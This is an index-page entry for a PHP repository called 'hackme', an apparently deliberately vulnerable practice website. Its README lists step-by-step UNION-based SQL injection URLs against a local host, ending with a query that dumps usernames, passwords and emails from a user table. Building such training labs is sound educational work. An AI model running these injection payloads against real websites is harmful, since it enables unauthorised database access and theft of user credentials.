Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ttibensky/hackme
website for code vulnerability testing (educational purposes only)
https://github.com/ttibensky/hackme
Last synced: 21 days ago
JSON representation
website for code vulnerability testing (educational purposes only)
- Host: GitHub
- URL: https://github.com/ttibensky/hackme
- Owner: ttibensky
- Created: 2014-03-26T22:22:24.000Z (over 10 years ago)
- Default Branch: master
- Last Pushed: 2014-08-18T12:42:45.000Z (over 10 years ago)
- Last Synced: 2024-10-16T01:27:23.461Z (2 months ago)
- Language: PHP
- Size: 172 KB
- Stars: 1
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
hackme
======
website for code vulnerability testing (educational purposes only)
### sql injection steps
1. Check for vulnerability
http://hackme.dev/?id=%27
2. Find the number of columns
wait for error
http://hackme.dev/?id=1 order by 1
...
http://hackme.dev/?id=1 order by 7
3. check union select to identify columns
http://hackme.dev/?id=1 union all select 1,2,3,4,5,6
4. identify table names
http://hackme.dev/?id=1 union all select 1,table_name,3,4,5,6 from information_schema.tables
5. get columns from user table
http://hackme.dev/?id=1 union all select 1,column_name,3,4,5,6 from information_schema.columns where table_name='user'
6. now select * from user table
http://hackme.dev/?id=1 union all select 1,username,password,email,5,6 from user
more examples here:
http://www.exploit-db.com/papers/13045/